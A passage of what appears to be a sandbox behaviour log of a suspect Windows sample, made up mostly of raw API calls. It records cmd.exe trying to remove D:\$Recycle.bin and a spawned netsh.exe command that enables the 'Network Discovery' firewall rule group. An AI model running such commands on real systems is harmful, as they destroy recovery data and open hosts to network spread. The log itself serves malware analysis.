LCType=0x1e, lpLCData=0x4aa04950, cchData=8 | out: lpLCData=":") returned 2 [0081.806] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x39f6b0, cchData=128 | out: lpLCData="0") returned 2 [0081.806] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x39f6b0, cchData=128 | out: lpLCData="0") returned 2 [0081.806] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x39f6b0, cchData=128 | out: lpLCData="1") returned 2 [0081.806] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4aa04940, cchData=8 | out: lpLCData="/") returned 2 [0081.806] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4aa04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0081.806] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4aa04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0081.806] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4aa04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0081.806] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4aa04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0081.806] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4aa04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0081.806] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4aa04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0081.806] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4aa04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0081.806] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4aa04930, cchData=8 | out: lpLCData=".") returned 2 [0081.806] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4aa04920, cchData=8 | out: lpLCData=",") returned 2 [0081.806] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0081.807] GetProcessHeap () returned 0x780000 [0081.807] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x20c) returned 0x792db8 [0081.807] GetConsoleTitleW (in: lpConsoleTitle=0x792db8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0081.807] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0081.808] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0081.808] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0081.808] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0081.809] GetProcessHeap () returned 0x780000 [0081.809] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x400a) returned 0x796258 [0081.809] GetProcessHeap () returned 0x780000 [0081.809] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x796258 | out: hHeap=0x780000) returned 1 [0081.809] _wcsicmp (_String1="rd", _String2=")") returned 73 [0081.809] _wcsicmp (_String1="FOR", _String2="rd") returned -12 [0081.809] _wcsicmp (_String1="FOR/?", _String2="rd") returned -12 [0081.809] _wcsicmp (_String1="IF", _String2="rd") returned -9 [0081.809] _wcsicmp (_String1="IF/?", _String2="rd") returned -9 [0081.809] _wcsicmp (_String1="REM", _String2="rd") returned 1 [0081.809] _wcsicmp (_String1="REM/?", _String2="rd") returned 1 [0081.809] GetProcessHeap () returned 0x780000 [0081.809] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x58) returned 0x792fd0 [0081.809] GetProcessHeap () returned 0x780000 [0081.809] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0xe) returned 0x78f6d8 [0081.810] GetProcessHeap () returned 0x780000 [0081.810] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x38) returned 0x793030 [0081.810] GetConsoleTitleW (in: lpConsoleTitle=0x39f3a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0082.046] _wcsicmp (_String1="rd", _String2="DIR") returned 14 [0082.046] _wcsicmp (_String1="rd", _String2="ERASE") returned 13 [0082.046] _wcsicmp (_String1="rd", _String2="DEL") returned 14 [0082.046] _wcsicmp (_String1="rd", _String2="TYPE") returned -2 [0082.046] _wcsicmp (_String1="rd", _String2="COPY") returned 15 [0082.046] _wcsicmp (_String1="rd", _String2="CD") returned 15 [0082.046] _wcsicmp (_String1="rd", _String2="CHDIR") returned 15 [0082.046] _wcsicmp (_String1="rd", _String2="RENAME") returned -1 [0082.046] _wcsicmp (_String1="rd", _String2="REN") returned -1 [0082.046] _wcsicmp (_String1="rd", _String2="ECHO") returned 13 [0082.046] _wcsicmp (_String1="rd", _String2="SET") returned -1 [0082.046] _wcsicmp (_String1="rd", _String2="PAUSE") returned 2 [0082.046] _wcsicmp (_String1="rd", _String2="DATE") returned 14 [0082.046] _wcsicmp (_String1="rd", _String2="TIME") returned -2 [0082.046] _wcsicmp (_String1="rd", _String2="PROMPT") returned 2 [0082.046] _wcsicmp (_String1="rd", _String2="MD") returned 5 [0082.047] _wcsicmp (_String1="rd", _String2="MKDIR") returned 5 [0082.047] _wcsicmp (_String1="rd", _String2="RD") returned 0 [0082.047] GetProcessHeap () returned 0x780000 [0082.047] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x68) returned 0x793070 [0082.048] GetProcessHeap () returned 0x780000 [0082.048] RtlReAllocateHeap (Heap=0x780000, Flags=0x0, Ptr=0x793070, Size=0x3c) returned 0x793070 [0082.048] GetProcessHeap () returned 0x780000 [0082.048] RtlSizeHeap (HeapHandle=0x780000, Flags=0x0, MemoryPointer=0x793070) returned 0x3c [0082.048] GetProcessHeap () returned 0x780000 [0082.048] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x3e) returned 0x7930b8 [0082.049] GetProcessHeap () returned 0x780000 [0082.049] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x68) returned 0x793100 [0082.050] GetProcessHeap () returned 0x780000 [0082.050] RtlReAllocateHeap (Heap=0x780000, Flags=0x0, Ptr=0x793100, Size=0x3c) returned 0x793100 [0082.050] GetProcessHeap () returned 0x780000 [0082.050] RtlSizeHeap (HeapHandle=0x780000, Flags=0x0, MemoryPointer=0x793100) returned 0x3c [0082.050] GetProcessHeap () returned 0x780000 [0082.050] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x2a) returned 0x793148 [0082.050] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x39f160 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0082.050] FindFirstFileW (in: lpFileName="D:\\\\$Recycle.bin", lpFindFileData=0x39ec68 | out: lpFindFileData=0x39ec68*(dwFileAttributes=0x7956f0, ftCreationTime.dwLowDateTime=0x39f78c, ftCreationTime.dwHighDateTime=0x77cb1ecd, ftLastAccessTime.dwLowDateTime=0x39f018, ftLastAccessTime.dwHighDateTime=0xfffffffe, ftLastWriteTime.dwLowDateTime=0x39, ftLastWriteTime.dwHighDateTime=0x740072, nFileSizeHigh=0x39f570, nFileSizeLow=0x228, dwReserved0=0x2, dwReserved1=0x0, cFileName="r", cAlternateFileName="h")) returned 0xffffffff [0082.051] FindFirstFileW (in: lpFileName="D:\\\\$Recycle.bin\\*", lpFindFileData=0x39ec68 | out: lpFindFileData=0x39ec68*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39f78c, ftCreationTime.dwHighDateTime=0x77cb1ecd, ftLastAccessTime.dwLowDateTime=0x39f018, ftLastAccessTime.dwHighDateTime=0xfffffffe, ftLastWriteTime.dwLowDateTime=0x39, ftLastWriteTime.dwHighDateTime=0x740072, nFileSizeHigh=0x39f570, nFileSizeLow=0x228, dwReserved0=0x0, dwReserved1=0x0, cFileName="r", cAlternateFileName="h")) returned 0xffffffff [0082.051] GetFullPathNameW (in: lpFileName="D:\\\\$Recycle.bin", nBufferLength=0x4, lpBuffer=0x39ec2c, lpFilePart=0x39ec24 | out: lpBuffer="", lpFilePart=0x39ec24*=0x0) returned 0x11 [0082.055] RemoveDirectoryW (lpPathName="D:\\\\$Recycle.bin" (normalized: "d:\\$recycle.bin")) returned 0 [0082.055] GetLastError () returned 0x3 [0082.055] _get_osfhandle (_FileHandle=2) returned 0xfffffffe [0082.056] GetFileType (hFile=0xfffffffe) returned 0x0 [0082.056] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x3, dwLanguageId=0x0, lpBuffer=0x4aa14640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the path specified.\r\n") returned 0x2c [0082.120] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x3, dwLanguageId=0x0, lpBuffer=0x4aa14640, nSize=0x2000, Arguments=0x39f0c0 | out: lpBuffer="The system cannot find the path specified.\r\n") returned 0x2c [0082.120] _get_osfhandle (_FileHandle=2) returned 0xfffffffe [0082.120] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The system cannot find the path specified.\r\n", cchWideChar=-1, lpMultiByteStr=0x4aa06640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The system cannot find the path specified.\r\n", lpUsedDefaultChar=0x0) returned 45 [0082.120] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x4aa06640, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x39f098, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x39f098, lpOverlapped=0x0) returned 0 [0082.120] GetLastError () returned 0x6 [0082.159] exit (_Code=1) Process: id = "11" image_name = "netsh.exe" filename = "c:\\windows\\syswow64\\netsh.exe" page_root = "0x1668000" os_pid = "0xac8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"netsh\" advfirewall firewall set rule group=\\\"Network Discovery\\\" new enable=Yes" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 85 os_tid = 0x64 [0082.064] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24ff54 | out: lpSystemTimeAsFileTime=0x24ff54*(dwLowDateTime=0xbe51550, dwHighDateTime=0x1d6f0d1)) [0082.064] GetCurrentProcessId () returned 0xac8 [0082.064] GetCurrentThreadId () returned 0x64 [0082.064] GetTickCount () returned 0x114afb0 [0082.064] QueryPerformanceCounter (in: lpPerformanceCount=0x24ff4c | out: lpPerformanceCount=0x24ff4c*=20116538174) returned 1 [0082.066] GetModuleHandleA (lpModuleName=0x0) returned 0x15f0000 [0082.066] __set_app_type (_Type=0x1) [0082.066] __p__fmode () returned 0x770331f4 [0082.066] __p__commode () returned 0x770331fc [0082.066] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x15f93ef) returned 0x0 [0082.066] __wgetmainargs (in: _Argc=0x1607ef0, _Argv=0x1607ef8, _Env=0x1607ef4, _DoWildCard=0, _StartInfo=0x1607f00 | out: _Argc=0x1607ef0, _Argv=0x1607ef8, _Env=0x1607ef4) returned 0 [0082.067] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0082.067] GetModuleHandleW (lpModuleName=0x0) returned 0x15f0000 [0082.067] _vsnwprintf (in: _Buffer=0x1603ec0, _BufferCount=0x1fff, _Format="%s>", _ArgList=0x247ac0 | out: _Buffer="netsh>") returned 6 [0082.080] GetProcessHeap () returned 0x4f0000 [0082.080] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x504708 [0082.080] GetProcessHeap () returned 0x4f0000 [0082.080] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5060e0 [0082.080] GetProcessHeap () returned 0x4f0000 [0082.080] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5060f0 [0082.080] GetProcessHeap () returned 0x4f0000 [0082.080] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506100 [0082.080] GetProcessHeap () returned 0x4f0000 [0082.080] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506110 [0082.080] GetProcessHeap () returned 0x4f0000 [0082.080] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506120 [0082.080] GetProcessHeap () returned 0x4f0000 [0082.080] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506130 [0082.080] GetProcessHeap () returned 0x4f0000 [0082.080] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506140 [0082.080] GetProcessHeap () returned 0x4f0000 [0082.080] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506150 [0082.080] GetProcessHeap () returned 0x4f0000 [0082.080] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506160 [0082.080] GetProcessHeap () returned 0x4f0000 [0082.080] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506170 [0082.080] GetProcessHeap () returned 0x4f0000 [0082.080] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506180 [0082.080] GetProcessHeap () returned 0x4f0000 [0082.081] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5061a8 [0082.081] GetProcessHeap () returned 0x4f0000 [0082.081] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5061b8 [0082.081] GetProcessHeap () returned 0x4f0000 [0082.081] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5061c8 [0082.081] GetProcessHeap () returned 0x4f0000 [0082.081] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5061d8 [0082.081] GetProcessHeap () returned 0x4f0000 [0082.081] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5061e8 [0082.081] GetProcessHeap () returned 0x4f0000 [0082.081] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5061f8 [0082.081] GetProcessHeap () returned 0x4f0000 [0082.081] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506208 [0082.081] GetProcessHeap () returned 0x4f0000 [0082.081] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506218 [0082.081] GetProcessHeap () returned 0x4f0000 [0082.081] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506228 [0082.081] GetProcessHeap () returned 0x4f0000 [0082.081] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506238 [0082.081] GetProcessHeap () returned 0x4f0000 [0082.081] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506248 [0082.081] GetProcessHeap () returned 0x4f0000 [0082.081] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506258 [0082.081] GetProcessHeap () returned 0x4f0000 [0082.081] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506268 [0082.081] GetProcessHeap () returned 0x4f0000 [0082.081] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506278 [0082.081] GetProcessHeap () returned 0x4f0000 [0082.081] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506288 [0082.081] GetProcessHeap () returned 0x4f0000 [0082.081] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506298 [0082.081] GetProcessHeap () returned 0x4f0000 [0082.081] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5062a8 [0082.081] GetProcessHeap () returned 0x4f0000 [0082.081] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5062b8 [0082.081] GetProcessHeap () returned 0x4f0000 [0082.081] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5062c8 [0082.082] GetProcessHeap () returned 0x4f0000 [0082.082] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5062d8 [0082.082] GetProcessHeap () returned 0x4f0000 [0082.082] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5062e8 [0082.082] GetProcessHeap () returned 0x4f0000 [0082.082] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5062f8 [0082.082] GetProcessHeap () returned 0x4f0000 [0082.082] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506308 [0082.082] GetProcessHeap () returned 0x4f0000 [0082.082] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506318 [0082.082] GetProcessHeap () returned 0x4f0000 [0082.082] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506328 [0082.082] GetProcessHeap () returned 0x4f0000 [0082.082] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506338 [0082.082] GetProcessHeap () returned 0x4f0000 [0082.082] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506348 [0082.082] GetProcessHeap () returned 0x4f0000 [0082.082] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506358 [0082.082] GetProcessHeap () returned 0x4f0000 [0082.082] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506368 [0082.082] GetProcessHeap () returned 0x4f0000 [0082.082] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506378 [0082.082] GetProcessHeap () returned 0x4f0000 [0082.082] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506388 [0082.082] GetProcessHeap () returned 0x4f0000 [0082.082] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506398 [0082.082] GetProcessHeap () returned 0x4f0000 [0082.082] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5063a8 [0082.082] GetProcessHeap () returned 0x4f0000 [0082.082] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5063b8 [0082.082] GetProcessHeap () returned 0x4f0000 [0082.082] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5063c8 [0082.082] GetProcessHeap () returned 0x4f0000 [0082.082] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5063d8 [0082.082] GetProcessHeap () returned 0x4f0000 [0082.082] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5063e8 [0082.082] GetProcessHeap () returned 0x4f0000 [0082.083] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5063f8 [0082.083] GetProcessHeap () returned 0x4f0000 [0082.083] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506408 [0082.083] GetProcessHeap () returned 0x4f0000 [0082.083] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506418 [0082.083] GetProcessHeap () returned 0x4f0000 [0082.083] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506428 [0082.083] GetProcessHeap () returned 0x4f0000 [0082.083] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506438 [0082.083] GetProcessHeap () returned 0x4f0000 [0082.083] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506448 [0082.083] GetProcessHeap () returned 0x4f0000 [0082.083] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506458 [0082.083] GetProcessHeap () returned 0x4f0000 [0082.083] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506468 [0082.083] GetProcessHeap () returned 0x4f0000 [0082.083] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506478 [0082.083] GetProcessHeap () returned 0x4f0000 [0082.083] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506488 [0082.083] GetProcessHeap () returned 0x4f0000 [0082.083] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506498 [0082.083] GetProcessHeap () returned 0x4f0000 [0082.083] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5064a8 [0082.083] GetProcessHeap () returned 0x4f0000 [0082.083] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5064b8 [0082.083] GetProcessHeap () returned 0x4f0000 [0082.083] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5064c8 [0082.083] GetProcessHeap () returned 0x4f0000 [0082.083] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5064d8 [0082.083] GetProcessHeap () returned 0x4f0000 [0082.083] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5064e8 [0082.083] GetProcessHeap () returned 0x4f0000 [0082.083] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5064f8 [0082.083] GetProcessHeap () returned 0x4f0000 [0082.083] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506508 [0082.083] GetProcessHeap () returned 0x4f0000 [0082.083] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506518 [0082.083] GetProcessHeap () returned 0x4f0000 [0082.083] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506528 [0082.083] GetProcessHeap () returned 0x4f0000 [0082.084] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506538 [0082.084] GetProcessHeap () returned 0x4f0000 [0082.084] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506548 [0082.084] GetProcessHeap () returned 0x4f0000 [0082.084] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506558 [0082.084] GetProcessHeap () returned 0x4f0000 [0082.084] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506568 [0082.084] GetProcessHeap () returned 0x4f0000 [0082.084] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506578 [0082.084] GetProcessHeap () returned 0x4f0000 [0082.084] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5065a8 [0082.084] GetProcessHeap () returned 0x4f0000 [0082.084] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5065b8 [0082.084] GetProcessHeap () returned 0x4f0000 [0082.084] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5065c8 [0082.084] GetProcessHeap () returned 0x4f0000 [0082.084] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5065d8 [0082.084] GetProcessHeap () returned 0x4f0000 [0082.084] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5065e8 [0082.084] GetProcessHeap () returned 0x4f0000 [0082.084] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5065f8 [0082.084] GetProcessHeap () returned 0x4f0000 [0082.084] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506608 [0082.084] GetProcessHeap () returned 0x4f0000 [0082.084] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506618 [0082.084] GetProcessHeap () returned 0x4f0000 [0082.084] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506628 [0082.084] GetProcessHeap () returned 0x4f0000 [0082.084] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506638 [0082.084] GetProcessHeap () returned 0x4f0000 [0082.084] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506648 [0082.084] GetProcessHeap () returned 0x4f0000 [0082.084] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506658 [0082.084] GetProcessHeap () returned 0x4f0000 [0082.084] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506668 [0082.084] GetProcessHeap () returned 0x4f0000 [0082.084] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506678 [0082.084] GetProcessHeap () returned 0x4f0000 [0082.084] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506688 [0082.084] GetProcessHeap () returned 0x4f0000 [0082.085] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506698 [0082.085] GetProcessHeap () returned 0x4f0000 [0082.085] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5066a8 [0082.085] GetProcessHeap () returned 0x4f0000 [0082.085] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5066b8 [0082.085] GetProcessHeap () returned 0x4f0000 [0082.085] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5066c8 [0082.085] GetProcessHeap () returned 0x4f0000 [0082.085] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5066d8 [0082.085] GetProcessHeap () returned 0x4f0000 [0082.085] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5066e8 [0082.085] GetProcessHeap () returned 0x4f0000 [0082.085] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5066f8 [0082.085] GetProcessHeap () returned 0x4f0000 [0082.085] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506708 [0082.085] GetProcessHeap () returned 0x4f0000 [0082.085] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506718 [0082.085] GetProcessHeap () returned 0x4f0000 [0082.085] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506728 [0082.085] GetProcessHeap () returned 0x4f0000 [0082.085] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506738 [0082.085] GetProcessHeap () returned 0x4f0000 [0082.085] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506748 [0082.085] GetProcessHeap () returned 0x4f0000 [0082.085] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506758 [0082.085] GetProcessHeap () returned 0x4f0000 [0082.085] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506768 [0082.085] GetProcessHeap () returned 0x4f0000 [0082.085] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506778 [0082.085] GetProcessHeap () returned 0x4f0000 [0082.085] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506788 [0082.085] GetProcessHeap () returned 0x4f0000 [0082.085] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x506798 [0082.085] GetProcessHeap () returned 0x4f0000 [0082.085] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5067a8 [0082.085] GetProcessHeap () returned 0x4f0000 [0082.085] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5067b8 [0082.085] GetProcessHeap () returned 0x4f0000 [0082.086] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5067c8 [0082.086] GetProcessHeap () returned 0x4f0000 [0082.086] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, 